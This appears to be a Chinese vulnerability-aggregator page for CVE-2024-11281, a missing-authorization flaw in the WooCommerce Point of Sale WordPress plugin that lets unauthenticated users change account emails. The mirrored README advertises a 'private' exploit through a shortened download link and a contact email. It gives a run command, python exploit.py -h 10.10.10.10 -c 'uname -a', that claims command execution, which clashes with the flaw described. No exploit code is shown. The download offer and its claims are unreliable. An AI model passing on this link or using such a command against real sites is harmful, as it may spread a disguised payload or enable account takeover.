关联漏洞
标题:
WordPress plugin WooCommerce Point of Sale 安全漏洞
(CVE-2024-11281)
描述:WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 WordPress plugin WooCommerce Point of Sale 6.1.0版本及之前版本存在安全漏洞,该漏洞源于当选项值为空时对“logged_in_user_id”值的验证不足。攻击者利用该漏洞可以更改任意用户帐户的电子邮件。
描述
Missing Authorization (CWE-862)
介绍
# CVE-2024-11281 - Missing Authorization (CWE-862)
## Overview
The WooCommerce Point of Sale plugin for WordPress is vulnerable to privilege escalation in all versions up to, and including, 6.1.0.
## Exploit:
## [Download here](https://bit.ly/3ZS0k7V)
## Details
+ **CVE ID**: [CVE-2024-11281](https://nvd.nist.gov/vuln/detail/CVE-2024-11281)
+ **Published**: 12/25/2024
+ **Impact**: Confidentiality
+ **Exploit Availability**: Not public, only private.
+ **CVSS**: 9.8
## Vulnerability Description
Vulnerability is due to insufficient validation on the 'logged_in_user_id' value when option values are empty and the ability for attackers to change the email of arbitrary user accounts. This makes it possible for unauthenticated attackers to change the email of arbitrary user accounts, including administrators, and reset their password to gain access to the account.
## Affected Versions
WooCommerce Point of Sale <= 6.1.0 - Insecure Direct Object Reference to Privilege Escalation via Arbitrary User Email Change
## Running
To run exploit you need Python 3.9. Execute:
```
python exploit.py -h 10.10.10.10 -c 'uname -a'
```
## Contact
+ **For inquiries, please contact:LeronTavish@outlook.com**
+ #### [Download here](https://bit.ly/3ZS0k7V)
文件快照
[4.0K] /data/pocs/7a8ef4f743150599e0fbd020d9ca694a2fbfd179
└── [1.2K] README.md
0 directories, 1 file
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。